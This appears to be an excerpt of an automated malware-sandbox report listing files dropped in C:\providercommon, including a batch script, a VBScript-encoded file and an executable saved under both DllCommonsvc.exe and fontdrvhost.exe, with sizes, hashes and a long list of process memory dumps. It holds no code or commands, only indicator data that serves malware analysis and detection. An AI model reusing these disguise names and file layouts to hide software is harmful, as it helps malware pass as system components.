Filesize
227B

MD5
d9e905a0b6956e6ebc24a73c84d4801c

SHA1
39ee263117c3cd0972303d585911511b0927505c

SHA256
2ff612ebfaffd0efed79a213d9b429e5d2296b4208c9b5aec221ed751cf197b9

SHA512
94d792d8dbc9ea9d95368a6d04e15ae6fa250aec97bec5bb8edfb8640237a72006e10d84489780ccc77561f2553f601b69fd9172b2bc938e343a2d1596f7c026

Download Submit
C:\providercommon\1zu9dW.bat

Filesize
36B

MD5
6783c3ee07c7d151ceac57f1f9c8bed7

SHA1
17468f98f95bf504cc1f83c49e49a78526b3ea03

SHA256
8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

SHA512
c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

Download Submit
C:\providercommon\5b884080fd4f94

Filesize
769B

MD5
03396e17f2388009300dc223545bd7ed

SHA1
6a7049724c66c5cbe16b11d2c6eaed8e33997041

SHA256
592a91f31000b89ac8a9d3fb76222385ecdfa5a03eef6942bcd47e42a812d0d6

SHA512
65b23f061100141926904cc9f8dee5a0cf7a030a4e6f96f6a3a2749035d570bd97308ac939b7a067561d96a0a98118cdab5c02a0e1e077915c8163a001bc957f

Download Submit
C:\providercommon\DllCommonsvc.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\DllCommonsvc.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\DllCommonsvc.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\DllCommonsvc.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\fontdrvhost.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

Filesize
197B

MD5
8088241160261560a02c84025d107592

SHA1
083121f7027557570994c9fc211df61730455bb5

SHA256
2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

SHA512
20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

Download Submit
memory/316-204-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/316-178-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/388-227-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/388-248-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/840-158-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/840-173-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/1308-245-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/1308-228-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/1424-218-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/1424-237-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/1496-221-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/1496-249-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/1576-208-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/1576-175-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/1836-257-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/1896-259-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/2400-139-0x0000000000F30000-0x0000000001040000-memory.dmp

Filesize
1.1MB

Download
memory/2400-140-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/2400-151-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/2528-230-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/2528-251-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3224-239-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3224-234-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3228-223-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3228-235-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3452-200-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3452-172-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3468-186-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3468-152-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3512-179-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3512-207-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3516-255-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3572-188-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3572-157-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3668-148-0x000001B777F10000-0x000001B777F32000-memory.dmp

Filesize
136KB

Download
memory/3668-184-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3668-153-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3756-253-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3756-231-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3796-191-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3796-155-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3804-167-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3804-194-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3988-196-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/3988-174-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4176-169-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4176-198-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4212-219-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4212-241-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4280-261-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4596-271-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4608-269-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4608-180-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4808-171-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4808-203-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4900-243-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4900-220-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4956-154-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/4956-181-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/5004-192-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/5004-156-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/5372-272-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/5412-273-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download
memory/5452-274-0x00007FFF3C790000-0x00007FFF3D251000-memory.dmp

Filesize
10.8MB

Download